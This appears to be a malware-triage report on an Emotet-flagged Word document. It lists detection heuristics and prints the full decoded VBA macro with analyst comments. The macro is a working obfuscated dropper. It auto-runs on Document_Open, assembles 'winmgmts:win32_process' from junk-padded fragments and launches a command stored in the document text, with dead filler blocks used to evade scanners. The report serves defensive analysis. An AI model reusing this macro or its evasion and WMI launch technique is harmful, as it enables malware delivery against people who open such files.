MALICIOUS
172
Risk Score
Heuristics 7
-
ClamAV: Doc.Downloader.EmotetRed0121-9822961-0 — critical — CLAMAV_DETECTION: ClamAV detected this file as malware: Doc.Downloader.EmotetRed0121-9822961-0
-
VBA macros detected — medium — 3 related findings — OLE_VBA_MACROS: Document contains VBA macro code
-
CreateObject call — high — OLE_VBA_CREATEOBJ: CreateObject call. Matched line in script:
Set H48fzo4nx_auoj = CreateObject(Bjs5smq4b6nrho390) -
VBA p-code auto-exec with execution tokens — high — OLE_VBA_PCODE_AUTOEXEC_EXEC: Triggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it — it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
-
Document_Open macro — low — OLE_VBA_DOCOPEN: Document_Open macro. Matched line in script:
Private Sub Document_open() -
Suspicious extracted artifact — info — EXTRACTED_FILE_STATIC_TRIAGE: One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
-
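Embedded URL — info — EMBEDDED_URL: One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. URL: http://schemas.openxmlformats.org/drawingml/2006/main — In document text (OLE body). This address is the standard DrawingML XML namespace identifier rather than a download location, so it should not be treated as a network indicator for this sample.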
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 13358 bytes |
SHA-256: d9f18e07b2cda0154820923aed9480db24fb8a880670170e754e5527bedb7d75 |
|||
|
Detection
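ClamAV (this result appears to cover only the extracted macros.bas text):
No threats found — the ClamAV signature hit listed under Heuristics is on the parent document, so a clean result on the decoded macro source does not clear the sample.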
Obfuscation or payload:
likely
99 of 184 identifiers look randomly generated (e.g. 'Y1mvzksvnpv482gpkc') — consistent with name-mangling obfuscation.
|
|||
Preview script: first 1,000 lines of the extracted script
Attribute VB_Name = "Jk6cg1y99x8g2gm"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
' Analyst note: auto-exec entry point. Word raises Document_Open when the
' document is opened with macros enabled. The handler's only statement is a
' call to Jk8h9py70_6mnlg, the function in this listing that decodes strings
' and invokes CreateObject / .Create. This is the line matched by the
' OLE_VBA_DOCOPEN heuristic in the report.
Private Sub Document_open()
Jk8h9py70_6mnlg
End Sub
Attribute VB_Name = "Ub59o72h4fy5"
Attribute VB_Name = "Oy022p1v840"
' Analyst notes (comments added for triage; every statement is unchanged).
' Purpose: assembles an object name from fragmented string literals, passes it
' to CreateObject, then calls the returned object's Create method with a string
' decoded from the document's own content.
' Obfuscation layout: each live statement is followed by "GoTo <label>", which
' jumps over a filler "For Each ... Paragraphs" block straight to "<label>:".
' The filler blocks never run; they differ only in their randomised names.
' When reading, follow only the statement before each GoTo and the statement
' after each label.
Function Jk8h9py70_6mnlg()
' Suppresses every runtime error, so undefined names and failed calls are silent.
On Error Resume Next
' V1 is built from the document itself: Jk6cg1y99x8g2gm is the VB_Name of this
' ThisDocument module and .Content is its body. The two outer names are never
' assigned anywhere in this listing, so presumably they contribute nothing.
' Consequence for triage: the encoded command is stored in the document text,
' not in the macro source, so the macro alone does not reveal it.
V1 = F1m4shtr43l23 + Jk6cg1y99x8g2gm.Content + Wfpd5ebcy4_9
GoTo NmetZCjJp
' --- filler, skipped by the GoTo above (same pattern repeats below) ---
Dim WfYIEamIE As Paragraph
Set aaZAE = FTZdtBIe
For Each WfYIEamIE In Jk6cg1y99x8g2gm.Paragraphs
Set WDyFHKA = otSYAGP
If Left(WfYIEamIE.Range.ParagraphStyle, Len("xxx")) = "xxxx" Then
NmetZCjJp = WfYIEamIE.Range.ListFormat.ListString
ElseIf InStr(WfYIEamIE.Range.Text, "kkiew") > 1 Then
ZUwiI = WfYIEamIE.Range.Text
ZUwiI = Replace(saw, "sjgwb", "hqkwjbjdasd" & NmetZCjJp)
WfYIEamIE.Range.Text = ZUwiI
Set WfYIEamIE.Range.ParagraphStyle = Jk6cg1y99x8g2gm.Styles("Normal")
End If
Set XMCCFQ = axOAFCJI
Next WfYIEamIE
NmetZCjJp:
' String fragments padded with the junk token "sg yw ah". With the token
' removed these two read "p" and "rocess".
U7 = "sg yw ahpsg yw ah"
Lgrt4thwsma22dohfb = "sg yw ahrosg yw ahsg yw ahcesg yw ahssg yw ahssg yw ahsg yw ah"
GoTo BpPwGEE
Dim DyBcfElm As Paragraph
Set gkwUxCUBF = jtwVxnGKZ
For Each DyBcfElm In Jk6cg1y99x8g2gm.Paragraphs
Set HpLdEF = CXbeC
If Left(DyBcfElm.Range.ParagraphStyle, Len("xxx")) = "xxxx" Then
BpPwGEE = DyBcfElm.Range.ListFormat.ListString
ElseIf InStr(DyBcfElm.Range.Text, "kkiew") > 1 Then
tZvTEABHA = DyBcfElm.Range.Text
tZvTEABHA = Replace(saw, "sjgwb", "hqkwjbjdasd" & BpPwGEE)
DyBcfElm.Range.Text = tZvTEABHA
Set DyBcfElm.Range.ParagraphStyle = Jk6cg1y99x8g2gm.Styles("Normal")
End If
Set sPrcdGGr = THYSAHH
Next DyBcfElm
BpPwGEE:
' With the junk token removed this reads ":win32_".
Ii3lohgsmk1yehs9 = "sg yw ah:wsg yw ahsg yw ahinsg yw ah3sg yw ah2sg yw ah_sg yw ah"
GoTo KEcNAII
Dim UOXWGE As Paragraph
Set gpGSBBBP = iVguKC
For Each UOXWGE In Jk6cg1y99x8g2gm.Paragraphs
Set gyrvGs = Glxta
If Left(UOXWGE.Range.ParagraphStyle, Len("xxx")) = "xxxx" Then
KEcNAII = UOXWGE.Range.ListFormat.ListString
ElseIf InStr(UOXWGE.Range.Text, "kkiew") > 1 Then
PRJvEI = UOXWGE.Range.Text
PRJvEI = Replace(saw, "sjgwb", "hqkwjbjdasd" & KEcNAII)
UOXWGE.Range.Text = PRJvEI
Set UOXWGE.Range.ParagraphStyle = Jk6cg1y99x8g2gm.Styles("Normal")
End If
Set mfrZgGNEo = KqTNJTEBA
Next UOXWGE
KEcNAII:
' With the junk token removed this reads "winmgmt".
Ib947fn3l7axsf1_te = "wsg yw ahinsg yw ahmsg yw ahgmsg yw ahtsg yw ahsg yw ah"
GoTo tmlZgCIE
Dim NSqgD As Paragraph
Set mXLsDB = qEEIFh
For Each NSqgD In Jk6cg1y99x8g2gm.Paragraphs
Set HeACnG = yAeAeABR
If Left(NSqgD.Range.ParagraphStyle, Len("xxx")) = "xxxx" Then
tmlZgCIE = NSqgD.Range.ListFormat.ListString
ElseIf InStr(NSqgD.Range.Text, "kkiew") > 1 Then
ZNQPCAJN = NSqgD.Range.Text
ZNQPCAJN = Replace(saw, "sjgwb", "hqkwjbjdasd" & tmlZgCIE)
NSqgD.Range.Text = ZNQPCAJN
Set NSqgD.Range.ParagraphStyle = Jk6cg1y99x8g2gm.Styles("Normal")
End If
Set HWKgC = SKOTDHDDD
Next NSqgD
tmlZgCIE:
' One character is taken from the host application's name instead of a literal:
' Mid(Application.Name, 6, 1). In Word the name is "Microsoft Word", so this
' yields "s". The arithmetic (3 + 3, 1 / 1) only hides the constants 6 and 1.
Y4a5lo475h89hlpq = "sg yw ahsg yw ah" + Mid(Application.Name, 3 + 3, 1 / 1) + "sg yw ahsg yw ah"
GoTo hOQIGx
Dim OSRaCD As Paragraph
Set mWECHg = tTIAXJVHu
For Each OSRaCD In Jk6cg1y99x8g2gm.Paragraphs
Set NihQilXhS = bmDCt
If Left(OSRaCD.Range.ParagraphStyle, Len("xxx")) = "xxxx" Then
hOQIGx = OSRaCD.Range.ListFormat.ListString
ElseIf InStr(OSRaCD.Range.Text, "kkiew") > 1 Then
WzVRoAB = OSRaCD.Range.Text
WzVRoAB = Replace(saw, "sjgwb", "hqkwjbjdasd" & hOQIGx)
OSRaCD.Range.Text = WzVRoAB
Set OSRaCD.Range.ParagraphStyle = Jk6cg1y99x8g2gm.Styles("Normal")
End If
Set ZgKAKpX = wAkyGDnGw
Next OSRaCD
hOQIGx:
' Concatenation order of the fragments above. Once the junk token is stripped
' the result reads "winmgmts:win32_process" (the WMI Win32_Process class).
' Static string matching on the macro source will not see that name, because
' it never appears contiguously.
Xvl65f9z94a9yh9vn = Ib947fn3l7axsf1_te + Y4a5lo475h89hlpq + Ii3lohgsmk1yehs9 + U7 + Lgrt4thwsma22dohfb
GoTo xrCQGdE
Dim eFlhCG As Paragraph
Set DrZYnc = zfrwHItI
For Each eFlhCG In Jk6cg1y99x8g2gm.Paragraphs
Set jjTuoIz = cQooBMRJ
If Left(eFlhCG.Range.ParagraphStyle, Len("xxx")) = "xxxx" Then
xrCQGdE = eFlhCG.Range.ListFormat.ListString
ElseIf InStr(eFlhCG.Range.Text, "kkiew") > 1 Then
mALHMRAC = eFlhCG.Range.Text
mALHMRAC = Replace(saw, "sjgwb", "hqkwjbjdasd" & xrCQGdE)
eFlhCG.Range.Text = mALHMRAC
Set eFlhCG.Range.ParagraphStyle = Jk6cg1y99x8g2gm.Styles("Normal")
End If
Set Qqdhc = vsvuFCIAJ
Next eFlhCG
xrCQGdE:
' Ibqu7amd8y1bcmn0 is the decode wrapper defined later in this listing; it
' returns its argument with the junk token removed.
Bjs5smq4b6nrho390 = Ibqu7amd8y1bcmn0(Xvl65f9z94a9yh9vn)
GoTo SDgQDJGG
Dim JazBG As Paragraph
Set BWuuB = qQdSHBC
For Each JazBG In Jk6cg1y99x8g2gm.Paragraphs
Set bLbUQ = DjLCJB
If Left(JazBG.Range.ParagraphStyle, Len("xxx")) = "xxxx" Then
SDgQDJGG = JazBG.Range.ListFormat.ListString
ElseIf InStr(JazBG.Range.Text, "kkiew") > 1 Then
oaninTruw = JazBG.Range.Text
oaninTruw = Replace(saw, "sjgwb", "hqkwjbjdasd" & SDgQDJGG)
JazBG.Range.Text = oaninTruw
Set JazBG.Range.ParagraphStyle = Jk6cg1y99x8g2gm.Styles("Normal")
End If
Set VmLMeoAH = FCduqjF
Next JazBG
SDgQDJGG:
' Line matched by the OLE_VBA_CREATEOBJ heuristic: the decoded object name is
' passed to CreateObject and the result is kept for the Create call below.
Set H48fzo4nx_auoj = CreateObject(Bjs5smq4b6nrho390)
GoTo XrWLNG
Dim rVCCF As Paragraph
Set MNlvFjLC = vzJyHzBCG
For Each rVCCF In Jk6cg1y99x8g2gm.Paragraphs
Set TgasHF = uuuNH
If Left(rVCCF.Range.ParagraphStyle, Len("xxx")) = "xxxx" Then
XrWLNG = rVCCF.Range.ListFormat.ListString
ElseIf InStr(rVCCF.Range.Text, "kkiew") > 1 Then
xSMkGFJ = rVCCF.Range.Text
xSMkGFJ = Replace(saw, "sjgwb", "hqkwjbjdasd" & XrWLNG)
rVCCF.Range.Text = xSMkGFJ
Set rVCCF.Range.ParagraphStyle = Jk6cg1y99x8g2gm.Styles("Normal")
End If
Set aSMFINT = jCgcHHBBh
Next rVCCF
XrWLNG:
' KK is V1 from its fourth character onward (the first three are dropped),
' with the junk token removed by the decode wrapper.
KK = Ibqu7amd8y1bcmn0(Mid(V1, (4), Len(V1)))
' Execution step: Create is called on the object with KK as first argument.
' Given the decoded class name, this presumably is Win32_Process.Create with
' KK as the command line. The other two arguments are never assigned in this
' listing.
' NOTE(review): a process started through WMI is normally created by the WMI
' provider host rather than as a child of Word, so process-tree detections
' should not rely on a WINWORD.EXE parent alone; confirm in sandbox telemetry.
H48fzo4nx_auoj.Create KK, Mtvvb0_t9yv, Adi4sevpqmpc
GoTo pHKNGu
Dim CQaOAKBE As Paragraph
Set FrtgZEx = bsPklHBp
For Each CQaOAKBE In Jk6cg1y99x8g2gm.Paragraphs
Set zgBzZ = CgtqD
If Left(CQaOAKBE.Range.ParagraphStyle, Len("xxx")) = "xxxx" Then
pHKNGu = CQaOAKBE.Range.ListFormat.ListString
ElseIf InStr(CQaOAKBE.Range.Text, "kkiew") > 1 Then
XZoQAAHFD = CQaOAKBE.Range.Text
XZoQAAHFD = Replace(saw, "sjgwb", "hqkwjbjdasd" & pHKNGu)
CQaOAKBE.Range.Text = XZoQAAHFD
Set CQaOAKBE.Range.ParagraphStyle = Jk6cg1y99x8g2gm.Styles("Normal")
End If
Set INyeIAE = AcmSCGHE
Next CQaOAKBE
pHKNGu:
End Function
' Analyst notes (comments added for triage; every statement is unchanged).
' Purpose: decode wrapper. Copies its argument to a local, passes it to
' D5nh7u373cwnx8as_t (the junk-token stripper) and returns that result.
' It adds no transformation of its own; the extra hop only lengthens the
' call chain. Every block between a "GoTo <label>" and "<label>:" is filler
' that is never executed.
Function Ibqu7amd8y1bcmn0(Be6nm7e0cjj8)
' Suppresses every runtime error in this function.
On Error Resume Next
GoTo EWqIjBICF
Dim vZfpG As Paragraph
Set CZBLDIAR = QIQgCD
For Each vZfpG In Jk6cg1y99x8g2gm.Paragraphs
Set ILumEpHCt = sDjuG
If Left(vZfpG.Range.ParagraphStyle, Len("xxx")) = "xxxx" Then
EWqIjBICF = vZfpG.Range.ListFormat.ListString
ElseIf InStr(vZfpG.Range.Text, "kkiew") > 1 Then
RQvVwUiHj = vZfpG.Range.Text
RQvVwUiHj = Replace(saw, "sjgwb", "hqkwjbjdasd" & EWqIjBICF)
vZfpG.Range.Text = RQvVwUiHj
Set vZfpG.Range.ParagraphStyle = Jk6cg1y99x8g2gm.Styles("Normal")
End If
Set fPdDHGpJ = TRdJoJ
Next vZfpG
EWqIjBICF:
' Live statement 1: copy the input string.
Q7j63miu50k = Be6nm7e0cjj8
GoTo xLkcC
Dim clWDFdR As Paragraph
Set PLTeA = hAIfEjE
For Each clWDFdR In Jk6cg1y99x8g2gm.Paragraphs
Set wjaLt = YmjijU
If Left(clWDFdR.Range.ParagraphStyle, Len("xxx")) = "xxxx" Then
xLkcC = clWDFdR.Range.ListFormat.ListString
ElseIf InStr(clWDFdR.Range.Text, "kkiew") > 1 Then
RveaGGcVC = clWDFdR.Range.Text
RveaGGcVC = Replace(saw, "sjgwb", "hqkwjbjdasd" & xLkcC)
clWDFdR.Range.Text = RveaGGcVC
Set clWDFdR.Range.ParagraphStyle = Jk6cg1y99x8g2gm.Styles("Normal")
End If
Set abRofI = YHIYWsIBu
Next clWDFdR
xLkcC:
' Live statement 2: strip the junk token via D5nh7u373cwnx8as_t. The local
' name on the left is the example identifier quoted in the report's
' obfuscation finding.
Y1mvzksvnpv482gpkc = D5nh7u373cwnx8as_t(Q7j63miu50k)
GoTo vhMqmED
Dim ENavJC As Paragraph
Set JZNlGzJ = jWQmlwBI
For Each ENavJC In Jk6cg1y99x8g2gm.Paragraphs
Set EWeYpD = wbJSowA
If Left(ENavJC.Range.ParagraphStyle, Len("xxx")) = "xxxx" Then
vhMqmED = ENavJC.Range.ListFormat.ListString
ElseIf InStr(ENavJC.Range.Text, "kkiew") > 1 Then
GmuqiuI = ENavJC.Range.Text
GmuqiuI = Replace(saw, "sjgwb", "hqkwjbjdasd" & vhMqmED)
ENavJC.Range.Text = GmuqiuI
Set ENavJC.Range.ParagraphStyle = Jk6cg1y99x8g2gm.Styles("Normal")
End If
Set PBzxJCGB = VBTHH
Next ENavJC
vhMqmED:
' Live statement 3: assign the function's return value.
Ibqu7amd8y1bcmn0 = Y1mvzksvnpv482gpkc
GoTo cscEC
Dim qQdxeI As Paragraph
Set XcSrsH = AvxLVoJg
For Each qQdxeI In Jk6cg1y99x8g2gm.Paragraphs
Set wuYYJ = BCailB
If Left(qQdxeI.Range.ParagraphStyle, Len("xxx")) = "xxxx" Then
cscEC = qQdxeI.Range.ListFormat.ListString
ElseIf InStr(qQdxeI.Range.Text, "kkiew") > 1 Then
TZohEsQYJ = qQdxeI.Range.Text
TZohEsQYJ = Replace(saw, "sjgwb", "hqkwjbjdasd" & cscEC)
qQdxeI.Range.Text = TZohEsQYJ
Set qQdxeI.Range.ParagraphStyle = Jk6cg1y99x8g2gm.Styles("Normal")
End If
Set jKwXIvDyH = GSKNCHs
Next qQdxeI
cscEC:
End Function
' Analyst notes (comments added for triage; every statement is unchanged).
' Purpose: the string decoder. The only live statement is the single Replace
' call below. Everything else is "GoTo <label>" followed by a filler block
' that is jumped over, including several back-to-back jumps that have no live
' statement between them.
' Decoding scheme: every occurrence of the junk token "sg yw ah" in the input
' is replaced with G27kg6uz47n2x. That name is never assigned in this listing,
' so presumably it is empty and the token is simply deleted. The same token can
' therefore be used to clean strings recovered from the macro or from the
' document body during analysis.
Function D5nh7u373cwnx8as_t(O8t__by2t7q)
GoTo ZbANDA
Dim eTdrs As Paragraph
Set EKIhH = CfdfDC
For Each eTdrs In Jk6cg1y99x8g2gm.Paragraphs
Set JZkvhBGD = affIHDIFg
If Left(eTdrs.Range.ParagraphStyle, Len("xxx")) = "xxxx" Then
ZbANDA = eTdrs.Range.ListFormat.ListString
ElseIf InStr(eTdrs.Range.Text, "kkiew") > 1 Then
uqpkMjx = eTdrs.Range.Text
uqpkMjx = Replace(saw, "sjgwb", "hqkwjbjdasd" & ZbANDA)
eTdrs.Range.Text = uqpkMjx
Set eTdrs.Range.ParagraphStyle = Jk6cg1y99x8g2gm.Styles("Normal")
End If
Set eZtbwHL = znmCFTSe
Next eTdrs
ZbANDA:
GoTo oKOEL
Dim BMVEHvF As Paragraph
Set lmtpyA = BfIKD
For Each BMVEHvF In Jk6cg1y99x8g2gm.Paragraphs
Set FUUZBckCI = mbEkAaFBl
If Left(BMVEHvF.Range.ParagraphStyle, Len("xxx")) = "xxxx" Then
oKOEL = BMVEHvF.Range.ListFormat.ListString
ElseIf InStr(BMVEHvF.Range.Text, "kkiew") > 1 Then
aznobHPCs = BMVEHvF.Range.Text
aznobHPCs = Replace(saw, "sjgwb", "hqkwjbjdasd" & oKOEL)
BMVEHvF.Range.Text = aznobHPCs
Set BMVEHvF.Range.ParagraphStyle = Jk6cg1y99x8g2gm.Styles("Normal")
End If
Set pwMar = XVyJFBc
Next BMVEHvF
oKOEL:
GoTo xYsTAGJFd
Dim EWvPABiIp As Paragraph
Set bDbEUnc = uxVLt
For Each EWvPABiIp In Jk6cg1y99x8g2gm.Paragraphs
Set huzur = EywRJHC
If Left(EWvPABiIp.Range.ParagraphStyle, Len("xxx")) = "xxxx" Then
xYsTAGJFd = EWvPABiIp.Range.ListFormat.ListString
ElseIf InStr(EWvPABiIp.Range.Text, "kkiew") > 1 Then
oiyPOXUN = EWvPABiIp.Range.Text
oiyPOXUN = Replace(saw, "sjgwb", "hqkwjbjdasd" & xYsTAGJFd)
EWvPABiIp.Range.Text = oiyPOXUN
Set EWvPABiIp.Range.ParagraphStyle = Jk6cg1y99x8g2gm.Styles("Normal")
End If
Set jVGxCUFIA = dKhfCAJfB
Next EWvPABiIp
xYsTAGJFd:
' The one live statement: strip the junk token and return the cleaned string.
D5nh7u373cwnx8as_t = Replace(O8t__by2t7q, "sg yw ah", G27kg6uz47n2x)
GoTo PRENICF
Dim IXWFCtD As Paragraph
Set WizZHIG = bcsIF
For Each IXWFCtD In Jk6cg1y99x8g2gm.Paragraphs
Set jbxuf = YrSIw
If Left(IXWFCtD.Range.ParagraphStyle, Len("xxx")) = "xxxx" Then
PRENICF = IXWFCtD.Range.ListFormat.ListString
ElseIf InStr(IXWFCtD.Range.Text, "kkiew") > 1 Then
ugMMJ = IXWFCtD.Range.Text
ugMMJ = Replace(saw, "sjgwb", "hqkwjbjdasd" & PRENICF)
IXWFCtD.Range.Text = ugMMJ
Set IXWFCtD.Range.ParagraphStyle = Jk6cg1y99x8g2gm.Styles("Normal")
End If
Set yqTzhIxV = WwjsFItCJ
Next IXWFCtD
PRENICF:
GoTo CxajHI
Dim YmKBGFJD As Paragraph
Set XHuRw = jaczBEAF
For Each YmKBGFJD In Jk6cg1y99x8g2gm.Paragraphs
Set gYvmHBFYI = YEGREI
If Left(YmKBGFJD.Range.ParagraphStyle, Len("xxx")) = "xxxx" Then
CxajHI = YmKBGFJD.Range.ListFormat.ListString
ElseIf InStr(YmKBGFJD.Range.Text, "kkiew") > 1 Then
flJnhb = YmKBGFJD.Range.Text
flJnhb = Replace(saw, "sjgwb", "hqkwjbjdasd" & CxajHI)
YmKBGFJD.Range.Text = flJnhb
Set YmKBGFJD.Range.ParagraphStyle = Jk6cg1y99x8g2gm.Styles("Normal")
End If
Set bfogr = IRoIQ
Next YmKBGFJD
CxajHI:
GoTo fbFVfGgV
Dim pKPYJMs As Paragraph
Set NXoYa = ieJxx
For Each pKPYJMs In Jk6cg1y99x8g2gm.Paragraphs
Set ksBIG = TjvzcPEEd
If Left(pKPYJMs.Range.ParagraphStyle, Len("xxx")) = "xxxx" Then
fbFVfGgV = pKPYJMs.Range.ListFormat.ListString
ElseIf InStr(pKPYJMs.Range.Text, "kkiew") > 1 Then
GpgvGLjb = pKPYJMs.Range.Text
GpgvGLjb = Replace(saw, "sjgwb", "hqkwjbjdasd" & fbFVfGgV)
pKPYJMs.Range.Text = GpgvGLjb
Set pKPYJMs.Range.ParagraphStyle = Jk6cg1y99x8g2gm.Styles("Normal")
End If
Set sGdlBEoaC = HCJXa
Next pKPYJMs
fbFVfGgV:
End Function
|
|||